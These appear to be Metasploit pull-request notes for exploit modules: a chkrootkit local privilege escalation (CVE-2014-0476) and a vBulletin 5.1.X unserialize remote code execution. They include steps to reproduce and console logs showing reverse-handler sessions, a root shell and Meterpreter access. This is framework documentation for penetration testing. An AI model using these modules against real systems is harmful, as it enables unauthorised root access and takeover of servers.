This modules implements an exploit for CVE-2014-0476,
to gain root thanks to chkrootkit.
Its main issues is that you need to wait until chkrootkit
is executed in a crontab (or manually),
which can take 24h top with its default setup.
How to reproduce:
1. Install a version < 0.50 of chkrootkit
2. Launch the local module
3. Wait until chkrootkit's crontab kicks in
4. You've got a root shell
```
msf > use exploit/linux/local/chkrootkit
msf exploit(chkrootkit) > check
[*] 192.168.1.25 - The target appears to be vulnerable.
msf exploit(chkrootkit) > run
[*] Exploit completed, but no session was created.
[*] Started reverse handler on 192.168.1.11:9999
msf exploit(chkrootkit) > [+] Target is vulnerable.
[!] Rooting depends of the crontab, this could take a while.
[*] Payload written to /tmp/update
[*] Waiting to chkrookit to be run be a cron tab...
[*] Command shell session 6 opened (192.168.1.11:9999 -> 192.168.1.25:40006) at 2015-11-06 20:53:00 +0100
[+] Deleted /tmp/update
msf exploit(chkrootkit) > sessions -i 6
[*] Starting interaction with 6...
id
uid=0(root) gid=0(root) groups=0(root)
```
This module implements the recent unserialize-powered RCE against
vBulletin 5.1.X
Step to reproduce:
1. Install vBulletin 5.1.X
2. Launch the exploit against it
```
msf exploit(vbulletin_unserialize) > check
[*] 192.168.1.25:80 - The target appears to be vulnerable.
msf exploit(vbulletin_unserialize) >
```
```
msf exploit(vbulletin) > run
[*] Started reverse handler on 192.168.1.11:4444
[*] Sending stage (33068 bytes) to 192.168.1.25
[*] Meterpreter session 1 opened (192.168.1.11:4444 -> 192.168.1.25:49642) at 2015-11-06 14:04:46 +0100
meterpreter > getuid
Server username: www-data (33)
```
This exploit is rather similiar to uptime_file_upload.rb, because
they both abuse post2file to upload. The difference is that this
module requires a priv escalation to be able to upload, and the
other one doesn't.
wchen-r7